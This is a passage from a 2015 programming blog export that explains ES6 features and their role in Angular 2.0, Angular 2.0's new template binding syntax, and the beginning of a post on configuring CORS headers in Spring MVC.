console.log(add(10, 5));</code></pre>
<br />
When creating a function with multiple parameters you must define them within parentheses.<br />
<br />
You can also have multiple statements within a fat arrow by using brackets:<br />
<pre><code class="javascript">var squareAndPrint = x => {
var squared = x * x;
console.log(squared);
return squared;
};
var fourSquared = squareAndPrint(4); // Prints 16 and returns 16</code></pre>
<br />
The fat arrow also has one other nice property: it doesn't change the 'this' context. Compare and contrast the following ES5 and ES6 code:<br />
<pre><code class="javascript">// ES5
var maarten = {
name: 'Maarten',
age: 25,
birthDay: function() {
console.log(this.name + ' is ' + this.age);
var self = this; // setTimeout changes this context, so keep it safe.
setTimeout(function() {
self.age += 1;
console.log(self.name + ' is ' + self.age);
}, 1000);
}
}
maarten.birthDay();
// Prints Maarten is 25
// Prints Maarten is 26
// ES6
var bert = {
name: 'Bert',
age: 65,
// ES6 enhanced object literals allow for shorthand method definitions
birthDay() {
console.log(`${this.name} is ${this.age}`); // ES6 template strings
setTimeout(() => {
this.age += 1;
console.log(`${this.name} is ${this.age}`);
}, 1000);
}
}
bert.birthDay();
// Prints Bert is 65
// Prints Bert is 66</code></pre>
<br />
setTimeout normally changes the 'this' context, which is why in ES5 you often bind 'this' to some variable for later use. In the example this variable was called 'self'. The fat arrow does not create its own 'this'; it keeps the 'this' of the surrounding scope in which it was defined, so in the example above 'this' is still 'bert' inside the setTimeout callback. This makes 'this' act a little more as you would expect it to work. For more info see: <a href="https://developer.mozilla.org/en-us/docs/web/javascript/reference/functions/arrow_functions">https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Functions/Arrow_functions</a><br />
<h2>
Const</h2>
<br />
In ES6 you can define constants which cannot be reassigned via the 'const' keyword:<br />
<pre><code class="javascript">const PI = 3.14;
PI = 15; // Error: PI is read-only
const PI = 3.15; // Error: PI has already been declared</code></pre><br />
<br />
Constants cannot be reassigned, but they can be changed:<br />
<pre><code class="javascript">const names = [];
names.push('Sander');
names.push('Stefan');
console.log(names); // prints ['Sander', 'Stefan'];</code></pre>
<br />
Constants are lexically scoped:<br />
<pre><code class="javascript">function greet(greeting) {
const NAME = 'Maarten';
console.log(greeting + ' ' + NAME);
}
greet('Howdy!'); // logs: Howdy! Maarten
console.log(NAME); // NAME is not defined</code></pre>
<br />
NAME is created inside the scope for the greet function. Outside of the greet functions NAME is not defined.<br />
<h2>
Let</h2>
<br />
'let' is a lot like 'var' except it is scoped to the nearest enclosing block. For example:<br />
<pre><code class="javascript">if (true) {
let x = 10;
console.log(x);
}
console.log(x); // Error 'x' is not defined in this scope</code></pre>
<br />
Here you can see that 'x' is only available inside the 'if' block because that is where the 'x' was defined. If x was defined with a var however, the number 10 would have been printed twice. So let allows you to scope variables more tightly.<br />
<br />
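To make the difference concrete, here is the same snippet with 'var' instead of 'let' (a small sketch):<br />
<pre><code class="javascript">if (true) {
  var x = 10;
  console.log(x); // prints 10
}
console.log(x); // also prints 10: var is scoped to the function, not the block</code></pre>
<br />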
However let definitions are accessible in child scopes:<br />
<pre><code class="javascript">let x = 'hello';
console.log(x); // prints 'hello';
if (true) {
console.log(x); // prints 'hello'
}
console.log(x); // prints 'hello';</code></pre>
<br />
Redefining a let in a child scope does not affect the outer scope's let definition, because a let is defined per scope, for example:<br />
<pre><code class="javascript">let x = 'hello';
console.log(x); // prints 'hello';
if (true) {
let x = 10;
console.log(x); // prints 10
}
console.log(x); // Still prints 'hello';</code></pre>
<br />
When you try to redefine a 'let' in a child scope by using the 'let' from the parent scope you get a ReferenceError:<br />
<pre><code class="javascript">let x = 'hello';
console.log(x); // prints 'hello';
if (true) {
let x = x + ' world!';
console.log(x); // ReferenceError: can't access lexical declaration `x' before initialization
}</code></pre>
<br />
This can be explained as follows: in the statement let x = x + ' world!' the second 'x' refers to the 'x' that is being declared by that very statement, and not to the let x = 'hello' in the scope above. At the point where x + ' world!' is evaluated that inner 'x' is still uninitialized, which causes the error.<br />
<h2>
Destructuring</h2>
<br />
Destructuring makes it easy to get values from complex objects and assign them to variables.<br />
<br />
For example to get certain properties from an object and assign them:<br />
<pre><code class="javascript">let frame = {
x: 10,
y: 200,
width: 100,
height: 300
};
let {x, y} = frame;
console.log(x); // prints 10
console.log(y); // prints 200</code></pre>
<br />
You can do the same thing for 'positions' in an array:<br />
<pre><code class="javascript">let tuple = ['Maarten', 16, 1989];
let [name, age, birthYear] = tuple;
console.log(name); // prints 'Maarten'
console.log(age); // prints 16
console.log(birthYear); // prints 1989</code></pre>
<br />
You can use destructuring on a function's parameters too:<br />
<pre><code class="javascript">let frame = {
x: 10,
y: 200,
width: 100,
height: 300
};
function moveBy({x, y, width, height}, [dx, dy]) {
return {
x: x + dx,
y: y + dy,
width, // In ES6 this is equivalent to width: width,
height // In ES6 this is equivalent to height: height,
};
}
frame = moveBy(frame, [10, 10]);
console.log(frame); // prints {x: 20, y: 210, width: 100, height: 300}</code></pre>
<br />
In the example above you can see both array and object destructuring happen in the moveBy function. What makes destructuring powerful is that it allows you to program to the 'shape' of the data structure. One thing about destructuring objects is that you can name the binding whatever you want. For instance, you could rewrite moveBy to this:<br />
<pre><code class="javascript">function moveBy({x: oldX, y: oldY, width, height}, [dx, dy]) {
return {
x: oldX + dx,
y: oldY + dy,
width, // In ES6 this is equivalent to width: width,
height // In ES6 this is equivalent to height: height,
};
}</code></pre>
<br />
Whatever the 'value' of the key is becomes the binding for the variable in the function. So what {x: oldX} says is: there is a key called x in the first parameter, and I want to name it oldX.<br />
<h2>
Classes</h2>
<br />
JavaScript has prototypical inheritance, which makes it stand out from languages that use the more traditional classical inheritance, such as C++, Java, Ruby, Python, C# and Objective-C. People coming from those languages would often create libraries that use JavaScript's prototypical inheritance to mimic the more traditional classical inheritance.<br />
<br />
ES6 gives us some syntactic sugar to make the more traditional classical inheritance possible, without having to use a library. It is important to note that behind the scenes 'classes' are still implemented using prototypical inheritance. Here is an example:<br />
<pre><code class="javascript">class Living {
constructor(alive) {
this._alive = alive;
}
get isAlive() {
return this._alive;
}
set alive(value) {
this._alive = value;
}
}
class Human extends Living {
constructor(name) {
super(true);
this.name = name;
}
sayHi() {
if (this.isAlive) {
console.log(`${this.name} says hi!`);
} else {
console.log('What is dead may never die!');
}
}
}
var human = new Human('Maarten');
human.sayHi(); // prints Maarten says hi!
human.alive = false;
human.sayHi(); // prints What is dead may never die!
console.log(human instanceof Living); // prints true
console.log(human instanceof Human); // prints true</code></pre>
<br />
The function 'constructor' is the constructor for that class; you cannot add multiple constructors via method overloading.<br />
<ul><br />
<li> 'super' is used to call the parent constructor, in Human's case that is Living.</li>
<br />
<li>The 'get' before isAlive means isAlive is a computed property. See <a href="https://developer.mozilla.org/en-us/docs/web/javascript/reference/functions/get">get</a>. This makes this.isAlive possible without parenthesis.</li>
<br />
<li>The 'set' before alive means you can <a href="https://developer.mozilla.org/en-us/docs/web/javascript/reference/functions/set">set</a> the value via assignment. This makes human.alive = false possible.</li>
<br />
<li>You can only extend one class at a time, multiple inheritance is not possible.</li>
</ul>
<br />
<h2>
Generators</h2>
<br />
Generators are complex creatures that allow for some pretty awesome functionality. I doubt that you will ever need to write a generator yourself, but framework creators can use them to make your life easier.<br />
<br />
So what is a generator? A generator is a function that can be paused mid-execution to give or receive values. It does so via the 'yield' keyword. Let's look at a simple generator:<br />
<pre><code class="javascript">// The '*' denotes that threeCounter is a generator
function *threeCounter() {
yield 1;
yield 2;
yield 3;
}
// Create an instance of actual generator by calling it.
let counter = threeCounter();
console.log(counter.next().value); // prints 1
console.log(counter.next().value); // prints 2
console.log(counter.next().value); // prints 3
console.log(counter.next().value); // prints undefined
console.log(counter.next()); // prints {value: undefined, done: true}</code></pre>
<br />
In the example above we define a generator called threeCounter: it yields a number each time it is asked for one, and after it has yielded three times it is done. Each call to counter.next() returns an object with two properties: value, which is what the generator yielded, and done, a boolean which says whether the generator has any new values to give.<br />
<br />
You can instantiate a generator as many times as you want:<br />
<pre><code class="javascript">let a = threeCounter();
let b = threeCounter(); // 'b' is completely separate from 'a'
console.log(a.next()); // prints {value: 1, done: false}
console.log(a.next()); // prints {value: 2, done: false}
console.log(b.next()); // prints {value: 1, done: false}</code></pre>
<br />
Each generator you create acts independently from other generators of the same type. I would like to say that calling a generator creates an "instance" of that generator, like calling new on a class would. Perhaps it would have been better if generators were created with the 'new' keyword as well.<br />
<br />
A generator is also an iterator, which means we can use it inside for...of loops:<br />
<pre><code class="javascript">for (let number of threeCounter()) {
console.log(number);
}</code></pre>
<br />
You can make generators that never stop providing values. For instance, here is a generator which creates class names for a zebra-striped table:<br />
<pre><code class="javascript">function *zebraGenerator() {
const GRAY = '.gray';
const WHITE = '.white';
let color = GRAY;
while(true) {
if (color === GRAY) {
yield color;
color = WHITE;
} else {
yield color;
color = GRAY;
}
}
}
let zebra = zebraGenerator();
console.log(zebra.next().value); // prints '.gray'
console.log(zebra.next().value); // prints '.white'
console.log(zebra.next().value); // prints '.gray'
console.log(zebra.next().value); // prints '.white'</code></pre>
<br />
So even though the zebraGenerator has a while(true), it doesn't run in an infinite loop, it stops each time there is a yield and provides the caller with a color.<br />
<br />
We've seen how we can get values from a generator, but we can also provide generators with values:<br />
<pre><code class="javascript">function massiveCalculation(generator) {
setTimeout(() => {
generator.next(42);
}, 5000);
}
function *resultPrinterGenerator(name) {
console.log(`=== ${name} ===`);
console.log('Started on: ' + new Date().toString());
var result = yield;
console.log(`The answer is: ${result}`);
console.log('Stopped on is: ' + new Date().toString());
console.log(`=== ${name} ===`);
}
var resultPrinter = resultPrinterGenerator('massiveCalculation');
/*
Quirk: you have to call 'next' at least once before you
can send a value to a generator.
*/
resultPrinter.next();
massiveCalculation(resultPrinter);
/* Console output:
=== massiveCalculation ===
Started on: Wed May 15 2015 12:51:49 GMT+0200 (CEST)
The answer is: 42
Stopped on is: Wed May 15 2015 12:51:54 GMT+0200 (CEST)
=== massiveCalculation ===
*/</code></pre>
<br />
I know this example above is kind of contrived, but it demonstrates how to send values from the outside to the generator by using generator.next(42). You can also see that you can pass parameters to the generator function itself. In the above example I gave the string 'massiveCalculation' as a parameter, so the printer could make a nice header.<br />
<br />
Passing values to generators is typically something library creators use to make our lives easier. For example:<br />
<pre><code class="javascript">import csp from 'js-csp';
csp.go(function* () {
let element = document.querySelector('#uiElement1');
let channel = listen(element, 'mousemove');
while (true) {
let event = yield csp.take(channel);
let x = event.layerX || event.clientX;
let y = event.layerY || event.clientY;
element.textContent = `${x}, ${y}`;
}
});</code></pre>
<br />
This is from a library called <a href="https://github.com/ubolonton/js-csp">js-csp</a>, with which you can create Go-like channels. In the example above a channel for 'mousemove' events is created, and it is consumed using yield to print the location of the mouse. With channels you can implement producer/consumer-like patterns to manage asynchronous events.<br />
<br />
Another cool example uses generators to make asynchronous code look like synchronous code:<br />
<pre><code class="javascript">co(function* () {
try {
let [croftStr, bondStr] = yield Promise.all([
getFile('http://localhost:8000/croft.json'),
getFile('http://localhost:8000/bond.json'),
]);
let croftJson = JSON.parse(croftStr);
let bondJson = JSON.parse(bondStr);
console.log(croftJson);
console.log(bondJson);
} catch (e) {
console.log('Failure to read: ' + e);
}
});</code></pre>
<br />
This "co" function comes from the <a href="https://github.com/tj/co">Co library</a>, it lets you yield promises to "co" so it can handle the asynchronous parts of the code. It will resume running the code once all promises are resolved, this way you don't have to write the then or error functions. This makes the code look synchronous, which makes the code easier to understand.<br />
<br />
<a href="http://www.2ality.com/2015/03/es6-generators.html">Here is a really exhaustive look at generators</a> from ES6 guru <a href="http://rauschma.de/">Dr. Axel Rauschmayer</a>.<br />
<br />
Of course Co is just a bridge until ES7's '<a href="http://jakearchibald.com/2014/es7-async-functions/">await</a>' syntax arrives!<br />
<h2>
Modules</h2>
<br />
So there is a lot of cool new stuff in ES6, but there is still one problem: how are you going to share all the classes, generators, and variables you have made? Until a couple of years ago the most common way was to give people a JS file and namespace your code, something like this:<br />
<pre><code class="javascript">var $ = (function() {
var m = {};
var _p = 10; // private value do not touch!
m.awesome = function(b) {
return _p * b;
};
return m;
}());</code></pre>
<br />
This way you had private variables and created an API you exposed to some global variable. There are many downsides to this approach:<br />
<ul><br />
<li>Name clashes if some other library also uses the $ sign.</li>
<br />
<li>Cannot import specific functions, you must take everything.</li>
<br />
<li>Cannot load modules programmatically / lazily.</li>
</ul>
<br />
Luckily ES6 has added support for creating modules. Let's define an ES6 module:<br />
<pre><code class="javascript">// Filename: Frame.js
export function moveBy({x, y, width, height}, [dx, dy]) {
return {x: x + dx, y: y + dy, width, height};
}
export function origin(frame) {
return {x: frame.x, y: frame.y};
}
export function size(frame) {
return {width: frame.width, height: frame.height};
}
export function getCenter({x, y, width, height}) {
return {
x: x + width / 2,
y: y + height / 2
}
}
export function distance({x: x1, y: y1}, {x: x2, y: y2}) {
let xd = x2 - x1;
let yd = y2 - y1;
return Math.sqrt(xd * xd + yd * yd);
}
export const maarten = "Maarten";</code></pre>
<br />
We can then import the module above in a couple of ways:<br />
<pre><code class="javascript">// 1. Import everything from the module to the current namespace:
import * from "Frame";
let f = {x: 10, y: 10, width: 100, height: 100};
size(f);
// 2. Import everything under a binding in the current namespace:
import * as Frame from "Frame";
let f = {x: 10, y: 10, width: 100, height: 100};
Frame.size(f);
// 3. Import only specific functions from the module
import {size, moveBy} from "Frame";
let f = {x: 10, y: 10, width: 100, height: 100};
size(f);
moveBy(f, [10, 44]);
// 4. Import specific functions and rebind them under a different name
import {size as frameSize} from "Frame";
// Name clash!
function size()
{
return 9000;
}
let f = {x: 10, y: 10, width: 100, height: 100};
frameSize(f);</code></pre>
<br />
The examples above show how versatile the new import syntax is. It is easy to prevent name clashes because there are so many ways to rename imports.<br />
<h2>
Want to know more?</h2>
<br />
Here's a list of resources with even more examples. I recommend going through the first two:<br />
<br />
• <a href="https://github.com/lukehoban/es6features">https://github.com/lukehoban/es6features</a><br />
<br />
• <a href="https://github.com/google/traceur-compiler/wiki/languagefeatures">https://github.com/google/traceur-compiler/wiki/LanguageFeatures</a><br />
<br />
• <a href="http://davidwalsh.name/es6-generators">http://davidwalsh.name/es6-generators</a><br />
<br />
• <a href="http://www.2ality.com/2015/03/es6-generators.html">http://www.2ality.com/2015/03/es6-generators.html</a> (exhaustive look at generators)<br />
<br />
• <a href="http://jakearchibald.com/2014/es7-async-functions/">http://jakearchibald.com/2014/es7-async-functions/</a> (technically ES7 but it is to awesome to ignore)<br />
<br />
• <a href="http://www.2ality.com/2014/09/es6-modules-final.html">http://www.2ality.com/2014/09/es6-modules-final.html</a><br />
<h1>
ES6 and Angular 2.0</h1>
<br />
By now you have a pretty good idea of some of the features that ES6 adds to JavaScript. So what does it have to do with Angular 2.0?<br />
<br />
The first thing is that Angular 2.0 will use classes a lot more instead of functions. Everything from directives to services will be a class in 2.0.<br />
<br />
But the most important thing is that 2.0 uses ES6’s module system instead of the custom module system that 1.x had. This greatly affects the way we write the JavaScript part of our Angular 2.0 code.<br />
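To make that concrete, here is a small sketch of what a service could look like in Angular 2.0; the names and the way the dependency arrives are made up for illustration, not an official API. The point is that it is just an ES6 class exported from an ES6 module, instead of a factory registered on angular.module():<br />
<pre><code class="javascript">// users.js -- a plain ES6 module exporting a plain ES6 class.
export class UserService {
  constructor(http) {
    this.http = http; // dependencies arrive via the constructor
  }
  findAll() {
    return this.http.get('/api/users');
  }
}

// Elsewhere it can be imported like any other ES6 module:
// import {UserService} from './users';</code></pre>
<br />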
<h2>
Sneak peek</h2><br />
<br />
Here is a small example on how you would use modules in Angular 2.0:<br />
<pre><code class="javascript">import {Component, View} from 'angular2/angular2 ';</code></pre>
<br />
<h2>
Angular 1.x's module system</h2>
<br />
So what was wrong with the 1.x module system? Lets look at an example:<br />
<pre><code class="javascript">angular.module('users')
.factory('userFactory', ['$http', function($http) {
// code for userFactory which uses $http
}]);</code></pre>
<br />
In the module definition above we see a factory called "userFactory" being assigned to the "users" module. The "userFactory" has a dependency on the $http service that Angular 1.x provides.<br />
<br />
The first downside to the Angular 1.x module system is that it is string based. This makes the module system brittle: one spelling mistake and the whole thing falls down like a house of cards.<br />
<br />
The second downside is that in order to survive minification (jsmin) you must declare all dependencies inside of an array as strings. This is why '$http' is declared inside the array as a string, and as $http, the variable, in the function. You can use ngAnnotate so you don’t have to write this code manually, but it is still a hassle.<br />
<br />
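For comparison, this is what the same factory looks like without the array notation; it works fine in development, but after minification the parameter name is mangled and the injection breaks (a sketch of the failure mode, not code you would want to ship):<br />
<pre><code class="javascript">angular.module('users')
  .factory('userFactory', function($http) {
    // Angular 1.x infers the dependency from the parameter name '$http'.
    // A minifier renames $http to something like 'a', and Angular can no
    // longer figure out which service to inject.
  });</code></pre>
<br />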
The third, and most important downside, is that Angular 1.x modules only work inside the Angular world. If you have found a great library that was written in pure JavaScript without Angular in mind, you must jump through hoops to get it working inside Angular. The same is also true in reverse, if you have a great Angular module and you want to use it outside of Angular, you are going to have to rewrite the code.<br />
<h1>
Conclusion</h1>
<br />
By embracing ES6 and its module system it will become much easier to use existing non Angular JavaScript code in an Angular project, and vice versa.<br />
<br />
This is not only true for Angular but for other frameworks as well, such as Ember, React and Knockout. Sharing code between frameworks is going to be easier than ever before. ES6 modules will act as a bridge between frameworks and the greater JavaScript world.<br />
<br />
I hope that the ES6 modules system will unite the JavaScript community.<br />
<br />
So in conclusion, when you hear about the death of the Angular 1.x module system, that's a good thing. We are getting a great alternative, ES6 modules, in return.<br />
<br />
<a href="http://blog.42.nl/articles/road-angular-2-0-pt-3-types/">Next week we will look at Types</a>, and why the Angular team thought ES6 alone was not enough!Anonymousnoreply@blogger.com42tag:blogger.com,1999:blog-8962763253387334081.post-50800019375975061462015-07-09T15:29:00.000+02:002016-02-01T13:23:28.986+01:00The Road to Angular 2.0 part 1: Template Syntax<h3>
Intro</h3>
A couple of weeks ago I gave a presentation at the <a href="http://gotoams.nl/">GOTO conference in Amsterdam</a> titled: The Road to Angular 2.0, in this <a href="http://gotocon.com/amsterdam-2015/presentation/The%20Road%20to%20Angular%202.0">presentation</a>, I walked the Road to Angular 2.0 to figure out why Angular 2.0 was so different from 1.x.<br />
<br />
This series of blogposts is a follow up to that presentation.<br />
<br />
<h3>
The Road</h3>
When the first details about Angular 2.0 emerged, my initial response was: "Wait, what?!" So many things will change from version 1.x to 2.0, is it even Angular?<br />
<br />
So I started digging through design documents, meeting notes, blogposts, and watched ng-conf videos. I quickly discovered a theme: The web will fundamentally change and Angular must evolve with it.<br />
<br />
Web Components are coming, ES6 is around the corner, TypeScript was invented. This series of blog posts takes you through these new innovations and shows you how they have influenced Angular 2.0’s design.<br />
<br />
I like to visualise all of the changes from Angular 1.x to 2.0 as a road. On this road we will come past various places that represent changes to Angular 1.x. Throughout this series of blog posts we will visit each of these places, and dive into how and why they have influenced Angular 2.0’s design. Here is the Road to Angular 2.0:<br />
<br />
<a href="http://blog.42.nl/wp-content/uploads/2015/07/theroadtoangular.png"><br />
<img alt="theroadtoangular" src="http://blog.42.nl/wp-content/uploads/2015/07/theroadtoangular.png" /><br />
</a><br />
<br />
<a name='more'></a><h3>
Template Syntax</h3>
Angular 2.0 has a new template syntax, which is radically different from 1.x. The changes made to the template syntax caused a strong negative reaction amongst the Angular community. It seemed like the Angular team changed the heart of Angular for no good reason.<br />
<br />
Now it seems we must learn Angular 2.0 all over again. But fear not, once you understand how the new template syntax works, and you know the reasoning behind it, it will make sense.<br />
<br />
<h3>
The new binding syntax</h3>
Let's look at the differences in the bindings syntax between the two versions of Angular:<br />
<br />
<strong>Angular 1.x</strong><br />
<pre><code class="html">
<span>Username: {{user.username}}</span>
<img ng-src="{{ user.imageUrl }}"/>
<button ng-click="upvote(user)">+1</button>
</code></pre>
<strong>Angular 2.0</strong><br />
<pre><code class="html">
<span>Username: {{user.username}}</span>
<img [src]="{{ user.imageUrl }}"/>
<button (click)="upvote(user)">+1</button>
</code></pre>
The example above shows a username, an image and an up-vote button.<br />
<br />
The first thing to note is that the first line is exactly the same in 1.x and 2.0. String interpolation is here to stay, so at least that part is still familiar.<br />
<br />
The second line of code shows us the first difference in the new template syntax. Instead of using the ng-src directive, in Angular 2.0 we see [src]. The brackets represent a binding to a property; this means that when the value changes in the “controller”, the value is updated in the view as well.<br />
<br />
The third line shows the new event syntax: whereas we used the special ng-click directive in 1.x, in 2.0 we simply surround the event name with parentheses.<br />
<br />
<h3>
Why change the binding syntax?</h3>
The main reason the syntax changed is unification. Let's look at the following line of 1.x template code:<br />
<br />
<pre><code class="html"><img ng-src="{{ user.imageUrl }}"/></code></pre>
<br />
In this code we use ng-src to set the source of an image. If you take a step back from Angular and look at the code as a novice who doesn’t know Angular, you could ask: why not simply write:<br />
<br />
<pre><code class="html"><img src="{{ user.imageUrl }}"/></code></pre>
The reason of course is that the browser will try to fetch: {{ user.imageUrl }} from the server. This is because the browser doesn’t understand Angular’s string interpolation syntax.<br />
<br />
So in Angular 1.x the team worked around this by introducing ng-src. The browser doesn’t recognize ng-src as the property that represents the URL of the image, so it leaves it alone. Angular can then, under the hood, write the actual "src" property once the binding can be resolved.<br />
<br />
In Angular 1.x ng-src is not the only directive that does this, in fact there are many more: ng-blur, ng-click, ng-hide, ng-show, ng-disabled, ng-selected. All of these directives were made so Angular doesn’t get in the browsers way and vice versa. So for each property the browser has, a corresponding Angular directive exists.<br />
<br />
Why is this so bad? Let's say, for example, that tomorrow all browsers include the following way to include HD images:<br />
<br />
<pre><code class="html"><img src-hd="hd-car.png" src="car.png"/></code></pre>
<br />
What does Angular 1.x have to do to make that work? Write a specialized directive of course! In an ideal world Angular would work with new HTML properties out of the box, without having to change Angular’s code.<br />
<br />
In Angular 2.0 the core team decided to tackle this problem at the root. By making one unified syntax for all properties. That’s where the bracket and parenthesis come from. So looking at the following line of code again:<br />
<br />
<pre><code class="html"><img [src]="{{ user.imageUrl }}"/></code></pre>
<br />
I would like to read this as: Create a property called "src" with the value of the expression, and update it whenever the value changes. The part between the brackets: "src" is just the name of the property Angular 2.0 must render on the HTML element.<br />
<br />
So if "src-hd" was introduced tomorrow, I could write this in Angular 2.0:<br />
<br />
<pre><code class="html"><img [src-hd]="hd-car.png" [src]="car.png"/></code></pre>
<br />
The best part is that, unlike Angular 1.x, Angular 2.0 would not have to be updated itself. So Angular 2.0’s template syntax unifies all of the built in directives from Angular 1.x into one syntax.<br />
<br />
<h3>
Benefits of the new binding syntax</h3>
The first benefit as you have already read is that Angular 2.0’s template syntax is more future proof than Angular 1.x’s.<br />
<br />
The new syntax is also easier to learn for beginners. If you already know HTML and you work as a web designer and suddenly you are dropped in an Angular 2.0 project, you simply need to learn to write square brackets around HTML properties you already know. There is no more need to learn all of these specific cases such as ng-src. The new syntax is simply closer to HTML than before.<br />
<br />
Another benefit of the new syntax is that it is easier to reason about. What I mean by reasoning is that it is easier to understand a template just by reading it. For example what does "selected" do in this Angular 1.x directive?<br />
<br />
<pre><code class="html"><google-map selected="markers(marker)"></google-map></code></pre>
<br />
It could mean one of the following things:<br />
<ol>
<li>It selects a certain marker based on the outcome of function "markers".</li>
<li>It is an event that executes a callback to "markers” whenever a marker is selected.</li>
<li>The "selected" property is a two way binding that changes through the "markers” function.</li>
</ol>
In order to know which one of the above answers is correct you would have to read the definition of the google-map directive.<br />
<br />
If this was an Angular 2.0 template:<br />
<br />
<pre><code class="html"><google-map (selected)="markers(marker)"></google-map></code></pre>
<br />
Now it is immediately clear that "selected" is an event because of the parenthesis. You would not have to read all of the surrounding code to understand what something does.<br />
<br />
<h3>
Local Variables</h3>
Angular 2.0 templates bring us a new feature that was not previously seen in Angular 1.x. This feature is called local variables; it allows us to create variables that are only available in a specific template.<br />
<br />
The reason for wanting to create variables that are only visible in your template is so you can create multiple templates for the same "controller". Imagine if you had to make a page with a YouTube player component, that needs to work on mobile and desktop. You discover two great Web Components: one that works great on desktop and another that works great on mobile devices. So you create two templates: one for desktop and one for mobile. But now you might need two controllers, because you have two different youtube components, right? The answer is no, because Angular 2.0 allows you to create 'variables' directly in your template.<br />
<br />
The syntax for creating a local variable is simply a hash sign (#) followed by a name.<br />
<br />
Let's look at a fictitious example of the mobile template:<br />
<br />
<pre><code class="html"><youtube-mobile #player></youtube-mobile>
<button (click)="player.startVideo('Maarten's Baptism')">Play</button></code></pre>
<br />
Now take a look the desktop's version of the template:<br />
<br />
<pre><code class="html"><youtube-embedded #player hd="yes"></youtube-embedded>
<button (click)="player.run('Maarten's Baptism')">Play</button></code></pre>
<br />
In both cases you can see we define a local variable called #player which we use to reference the 'player' HTML elements. In the play buttons we can then reference "player" in the (click) event to start a video. Note that the API to start a video is different between the desktop and mobile version. So even though the API is different we didn't have to touch the controller at all; that's the power of local variables!<br />
<br />
<h3>
Templates</h3>
Angular 2.0 also introduces a new concept called 'directive templates'; a directive template manipulates HTML. Let's look at an example:<br />
<br />
<pre><code class="html"><ul>
<li *ng-for="#name of names">Username: {{name}}</li>
</ul></code></pre>
<br />
If you know Angular 1.x you will find *ng-for familiar: it does what ng-repeat used to do. *ng-for manipulates the HTML by repeating the HTML element N times.<br />
<br />
Note that we create a local variable called #name that we reference inside of the <li> element. The #name variable is only available inside of the <li> element, because it is scoped to the template.<br />
<br />
Another example of a template is *ng-if:<br />
<br />
<pre><code class="html"><div *ng-if="todos.length === 0">You are done!</div></code></pre>
<br />
<br />
The reason this is called a 'template' is because behind the scenes Angular 2.0 will convert the code to a <template> tag. So the *ng-for example would expand to:<br />
<br />
<pre><code class="html"><template ng-for #name="$implicit" [ng-for-of]="name">
<li>{{name}}</li>
</template></code></pre>
<br />
A <template> element represents an inert piece of DOM that the browser will completely ignore. This gives frameworks such as Angular an easy way to define templates, without the browser trying to parse them and mess with them. The <template> element was basically created for use by JavaScript frameworks.<br />
<br />
The benefit of the new *template syntax is that your IDE and text editor can analyse these final <template> forms of the directive. This means that they can autocomplete your code and provide you with better help. This will ultimately make us, the developers that use Angular 2.0, more productive.<br />
<br />
<h3>
Codifying the new syntax</h3>
We can codify the new syntax as follows:<br />
<br />
<strong>Property bindings []</strong><br />
Square brackets represent a property which has a binding to a value. This binding is always an expression. Angular evaluates it every time inside the run loop when it is dirty checking for changes. Whenever a change is detected the binding is updated.<br />
<br />
The expressions should be pure: each time they are evaluated with the same parameters they should return the same value. They should not cause side effects.<br />
<br />
<strong>Events ()</strong><br />
Parentheses represent events. Event handlers are statements, which cause side effects. The events always originate from actions taken by the user, such as hovering the mouse or typing on the keyboard.<br />
<br />
<strong>Variables #</strong><br />
Hashtags represent local variables. These are only available inside of the template where they are defined. They can be used so different templates for mobile and desktop can contain completely different pieces of code, but still keep the same controller.<br />
<br />
<strong>Templates *</strong><br />
An asterisk represents a template with your HTML that is expanded to a <template> element behind the scenes. They were created so IDE's and text editors can better autocomplete the code.<br />
<br />
<h3>
Conclusion</h3>
The new syntax makes it easier for newcomers to learn, because it more closely resembles HTML, and because you do not have to learn the long list of built-in directives such as ng-src. It also makes it easier to reason about templates, so we can more easily discover what a template does.<br />
<a href="http://blog.42.nl/articles/the-road-to-angular-2-0-pt2-es6/">Next week we will take a look at ES6</a>, the new version of JavaScript, and how it affects Angular 2.0.Anonymousnoreply@blogger.com9Netherlands52.132633 5.291265999999950549.638041 0.12769199999995084 54.627224999999996 10.454839999999951tag:blogger.com,1999:blog-8962763253387334081.post-37709759372534199692015-04-13T17:42:00.000+02:002015-12-14T15:55:41.782+01:00CORS with Spring MVC<p><strong>In this blog post I will explain how to implement Cross-Origin Resource Sharing (CORS) on a Spring MVC backend.</strong></p>
<a name='more'></a>
<p>
CORS is a W3C spec that allows cross-domain communication from the browser. Whenever a request is made from http://www.domaina.com to http://www.domainb.com, or even from http://localhost:8000 to http://localhost:9000, you will need to implement CORS on your backend.
</p>
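<p>For example (a sketch with hypothetical URLs and paths): a page served from http://localhost:9000 that calls a Spring MVC backend on http://localhost:8080 triggers the browser's CORS checks:</p>
<pre><code class="javascript">
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:8080/api/users');
// Send cookies along; this requires Access-Control-Allow-Credentials on the backend.
xhr.withCredentials = true;
xhr.onload = function() {
    console.log(xhr.responseText);
};
xhr.send();
</code></pre>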
<p>
To allow CORS we need to add the following headers to all Spring MVC responses:<br />
</p>
<pre><code class="java">
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: http://localhost:9000
Access-Control-Allow-Methods: GET, OPTIONS, POST, PUT, DELETE
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Max-Age: 3600
</code></pre>
<p>The easiest way to do this is by creating an interceptor:</p>
<pre><code class="java">
public class CorsInterceptor extends HandlerInterceptorAdapter {
public static final String CREDENTIALS_NAME = "Access-Control-Allow-Credentials";
public static final String ORIGIN_NAME = "Access-Control-Allow-Origin";
public static final String METHODS_NAME = "Access-Control-Allow-Methods";
public static final String HEADERS_NAME = "Access-Control-Allow-Headers";
public static final String MAX_AGE_NAME = "Access-Control-Max-Age";
@Override
public boolean preHandle(HttpServletRequest request, HttpServletResponse response, Object handler) throws Exception {
response.setHeader(CREDENTIALS_NAME, "true");
response.setHeader(ORIGIN_NAME, "http://localhost:9000");
response.setHeader(METHODS_NAME, "GET, OPTIONS, POST, PUT, DELETE");
response.setHeader(HEADERS_NAME, "Origin, X-Requested-With, Content-Type, Accept");
response.setHeader(MAX_AGE_NAME, "3600");
return true;
}
}
</code></pre>
<p>
Then we register this interceptor in our web configuration:<br />
</p>
<pre><code class="java">public class WebMvcConfig extends WebMvcConfigurerAdapter {
@Override
public void addInterceptors(InterceptorRegistry registry) {
registry.addInterceptor(new CorsInterceptor());
}
...
}
</code></pre>
<p>Now all GET requests will be handled correctly.</p>
<h2>Modification requests</h2>
